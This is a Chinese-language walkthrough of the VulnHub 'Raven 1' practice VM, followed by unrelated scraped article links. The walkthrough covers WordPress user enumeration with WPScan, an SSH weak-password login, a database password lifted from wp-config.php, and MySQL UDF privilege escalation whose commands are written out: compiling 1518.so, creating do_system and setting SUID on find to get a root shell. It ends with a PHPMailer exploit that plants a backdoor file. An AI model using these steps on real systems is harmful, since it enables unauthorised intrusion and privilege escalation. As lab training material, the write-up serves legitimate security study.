仅供个人娱乐

靶机信息

Raven 下载地址:https://www.vulnhub.com/entry/raven-1,256/

一、主机探测

端口信息

目录扫描

80端口

根据页面开始搜寻有用的信息

得到信息

Wpscan漏洞利用

右上角BLOG ,会发现是 WordPress 系统。于是使用 WPScan 进行扫描

wpscan --url http://192.168.204.131/wordpress/  -ep -et -eu

-ep  枚举插件信息

-et  扫描主题

-eu  枚举用户

结果的到wordpress目录 用户等   用户有steven 和michael

发现靶机上的两个用户名:steven 和michael

使用ssh爆破  密码使用rockyou.txt

(重置虚拟机 ip改为 192.168.204.131)

将文件复制到root目录  并且解压

使用弱口令michael/michael 尝试登陆ssh

查看是否能用sudo提权,内核提权等等

一步一步    寻找有用信息

查看wp-config.php,发现mysql用户名以及密码 root/R@v3nSecurity

netstat -anpt
查看开放的端口,发现开放3306

进入数据库

root/R@v3nSecurity

信息收集

cmd5 破解

ssh登录

使用sudo python -c ‘import pty;pty.spawn("/bin/bash")’ 绕过限制,获得管理员权限

mysql udf 提权

ps -ef | grep mysql

ps -ef是以全格式显示当前所有的进程

grep 命令用于查找文件里符合条件的字符串

查看mysql udf漏洞的利用exp

进入kali apache的根目录

将文件复制到html目录

进行编译

gcc -g -c 1518.c

gcc -g -shared -Wl,-soname,1518.so -o 1518.so

靶机切换tmp目录
靶机wget下载       kali编译生成的1518.so

连接数据库

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select*fromfoo into dumpfile'/usr/lib/mysql/plugin/1518.so';

create function do_system returns integer soname'1518.so';

select*from mysql.func;

selectdo_system('chmod u+s /usr/bin/find');

exit

touch finn

find finn -exec"/bin/sh" \;

whoami

获得权限成功

打开http://192.168.204.131/vendor/

根据网页查找有用信息

searchsploit PHPMailer查看是否有漏洞,发现有漏洞利用脚本

复制到 /root

修改文件

(个人电脑问题,kali安装pip3,pip3 install requests-toolbelt)

脚本更名为 1.py   将脚本放置于/root

cd  /root
python3 1.py

访问http://192.168.204.131/contact.php

此时就会生成后门文件backlion.php

接着访问后门文件:http://192.168.204.131/backlion.php

进行监听 获取shell



raven靶机的更多相关文章

  1. kali渗透综合靶机(十)--Raven靶机

    kali渗透综合靶机(十)--Raven靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate=1000 ...

  2. Raven: 2靶机入侵

    0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机.有四个flag需要找出.在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵. ...

  3. Raven 2 靶机渗透

    0X00 前言 Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM.有四个标志要捕获.在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器 ...

  4. 21. 从一道CTF靶机来学习mysql-udf提权

    这次测试的靶机为 Raven: 2 这里是CTF解题视频地址:https://www.youtube.com/watch?v=KbUUn3SDqaU 此次靶机主要学习 PHPMailer 跟 mymq ...

  5. 22. CTF综合靶机渗透(十五)

    靶机说明: Game of Thrones Hacking CTF This is a challenge-game to measure your hacking skills. Set in Ga ...

  6. 实现一个脚本语言Raven(一)

    之前实现了Raven语言的0.1版,仅仅支持表达式处理与控制语句,由于不支持数组.函数.类,甚至都不是图灵完全的语言. 现在参考vczh的博客打算重新写一遍Raven语言.陈祖不愧是神啊,高中就写出支 ...

  7. CTF线下防御战 — 让你的靶机变成“铜墙铁壁”

    本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...

  8. Ms17-010进行WEB提权之实践下某培训靶机服务器

    前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...

  9. metasploit利用漏洞渗透攻击靶机

    1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...

随机推荐

  1. ffmpeg入门到实战-ffmpeg是怎么转码的?

    阅读目录 视频是怎么被播放的? ffmpeg命令的格式 ffmpeg转码输出的过程 视频是怎么被播放的? 我们知道,当下大多数播放器都是基于ffmpeg二次开发的.你有没有想过,你用播放器打开一个视频 ...

  2. JWT原理实现代码

    JWT学习文章: 第一篇:JWT原理 第二篇:JWT原理实现代码 上一篇学习了JWT的基本理论,这一篇将根据原理进行代码实现. 要想实现jwt的加密解密,要先生成一个SecurityKey,大家可以在 ...

  3. python之list列表(基础篇)

    特点:1.有序的 2.可以存放多个元素 3.每个元素可以是任何数据类型,4,通过下标值访问1,定义一个空列表  2,定义一个非空列表 3.访问列表中的元素(同str类型) 4,切片与步长(同str类型 ...

  4. lvm脚本

    # 2 SWAP 20GB SWAP # 3 /usr/sap 50GB /usr/sap # 4 Shared 1 x 512 GiB /hana/shared # 5.6 Log 2 x 300 ...

  5. 15、linux文件、目录的权限及如何改变权限(root用户不受任何权限的限制)

    15.1.linux普通文件的读.写.执行权限说明: r:读,表示具有读取\阅读文件内容的权限: w:可写,表示具有新增,修改文件内容的权限: 如果没有r配合,那么vi编辑文件会提示无法编辑(但可以强 ...

  6. Sql Server 查询正在执行的sql信息和锁定事务

    执行中的sql SELECT [Spid] = session_Id, ecid, [Database] = DB_NAME(sp.dbid), [User] = nt_username, [Stat ...

  7. 基于js的姓名校验

    // 姓名校验 isRightName: function(name) { var reg = /^[a-zA-Z\u4E00-\u9FA5\uF900-\uFA2D\u00B7\u2022\u009 ...

  8. linux 中获取进程和kill进程的几种方法

    ps: ps命令是最基本同时也是非常强大的进程查看命令,使用该命令可以确定有哪些进程正在运行和运行的状态.进程是否结束.进程有没有僵尸.哪些进程占用了过多的资源等等. 注意:ps是显示瞬间进程的状态, ...

  9. java.io.CharConversionException: Not an ISO 8859-1 character: [留]

    笔记一下 问题代码如下: response.setContentType("text/html;charset=utf-8");ServletOutputStream out = ...

  10. Java实验项目三——面向对象定义职工类和日期类

    Program:按照如下要求设计类: (1)设计一个日期类,用于记录年.月.日,并提供对日期处理的常用方法. (2)设计一个职工类,该职工类至少具有下面的属性:职工号,姓名,性别,生日,工作部门,参加 ...